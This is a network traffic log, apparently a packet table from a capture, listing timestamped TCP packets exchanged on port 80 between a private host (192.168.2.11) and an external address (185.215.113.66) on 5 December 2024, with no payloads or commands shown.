Dec 5, 2024 17:32:05.059839010 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.059911013 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.059953928 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.062495947 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.062510014 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.062521935 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.062582970 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.062583923 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.063236952 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.064523935 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.064537048 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.064548969 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.064609051 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.064609051 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.067538023 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.067603111 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.067692041 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.067734957 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.180608034 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.180624008 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.180681944 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.184597015 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.184675932 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.194741011 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.194762945 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.194786072 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.194945097 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.253947020 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.254057884 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.254079103 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.254121065 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.258222103 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.258302927 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.258368015 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.258404970 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.266921043 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.266988039 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.267025948 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.267064095 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.275242090 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.275322914 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.275332928 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.275420904 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.283904076 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.283973932 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.284048080 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.284048080 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.292282104 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.292319059 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.292350054 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.292350054 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.300750971 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.300805092 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.300847054 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.300885916 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.309364080 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.309387922 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.309413910 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.309467077 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.316919088 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.316975117 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.317032099 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.317111969 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.324781895 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.324882984 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.324930906 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.324966908 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.333508968 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.333731890 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.427836895 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.427923918 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.428025007 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.428025007 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.431689024 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.431754112 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.446558952 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.446670055 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.446742058 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.446794033 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.448420048 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.448484898 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.449248075 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.449294090 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.449357033 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.449393034 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.453732967 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.453778982 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.453831911 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.453881025 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.458225012 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.458271980 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.458349943 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.458381891 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.462714911 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.462771893 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.462806940 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.462929964 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.467775106 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.467808962 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.467816114 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.467876911 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.471678019 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.471724987 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.471801043 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.471837997 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.476272106 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.476378918 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.476413965 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.476413965 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.480670929 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.480762005 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.480766058 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.483782053 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.485102892 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.485165119 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.485232115 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.487782955 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.489685059 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.489810944 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.489845991 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.489845991 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.494124889 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.494203091 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.494237900 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.494237900 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.498528957 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.498579979 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.498672962 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.498719931 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.502989054 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.503036976 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.503143072 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.503187895 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.507455111 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.507584095 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.507607937 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.507633924 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.511908054 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.511960983 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.512008905 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.512041092 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.516429901 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.516510963 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.516534090 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.516580105 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.520921946 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.520977974 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.521020889 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.521087885 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.525362968 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.525418043 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.525482893 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.525587082 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.529861927 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.529957056 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.529974937 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.530083895 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.534336090 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.534404039 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.620160103 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.620249987 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.620286942 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.620286942 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.622114897 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.622164965 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.622167110 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.622203112 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.625082016 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.625127077 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.625133991 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.625262976 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.638462067 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.638586998 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.638621092 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.638621092 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.639452934 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.639630079 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.639669895 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.639671087 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.642822027 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.642930031 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.642932892 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.643027067 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.646182060 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.646286964 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.646333933 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.646444082 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.649585009 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.649651051 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.649677992 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.649724960 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.652893066 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.652939081 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.653058052 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.653175116 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.656121969 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.656168938 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.656312943 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.656368017 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.659346104 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.659399986 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.659432888 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.659589052 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.662411928 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.662477016 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.662509918 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.662576914 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.665591955 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.665642977 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.665674925 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.665674925 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.668716908 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.668766022 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.668797970 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.668797970 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.671921015 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.672091007 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.672128916 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.672128916 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.675148964 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.675209045 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.675241947 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.675241947 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.678178072 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.678304911 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.678340912 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.678340912 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.681318045 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.681421041 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.681457043 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.681457043 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.684535980 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.684617043 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.684672117 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.685376883 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.687700987 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.687747955 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.687769890 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.687793970 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.690738916 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.690774918 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.690805912 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.690805912 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.693867922 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.693965912 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.693969011 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.694010973 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.696991920 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.697072983 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.697089911 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.697283030 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.700345039 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.700392962 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.700505972 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.700855970 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.703320980 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.703428030 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.703461885 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.703463078 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.706456900 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.706532001 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.706562996 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.706655025 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.709584951 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.709654093 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.709696054 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.709849119 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.712685108 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.712730885 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.712794065 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.712842941 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.715895891 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.715979099 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.716017008 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.716104984 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.719023943 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.719096899 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.719161034 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.719223976 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.722145081 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.722237110 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.722371101 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.722403049 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.725298882 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.725421906 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.725455046 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.725455046 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.728415966 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.728538036 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.728570938 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.728570938 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.731561899 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.731632948 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.731667995 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.731741905 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.734734058 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.734869003 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.734899998 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.734987974 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.737890959 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.737946033 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.737977028 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.737977028 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.741128922 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.741180897 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.741252899 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.741373062 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.812510014 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.812552929 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.812612057 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.812612057 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.813760042 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.813818932 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.813821077 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.813867092 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.816416025 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.816437006 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.816466093 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.819089890 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.819137096 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.819137096 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.819334030 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.819518089 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.821588993 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.821619034 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.821655989 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.821655989 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.830518961 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.830665112 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.830701113 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.830701113 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.831650972 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.831772089 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.832127094 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.832242966 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.832268000 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.832277060 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:05.834522009 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.834721088 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:05.834758997 CET	49775	80	192.168.2.11	185.215.113.66
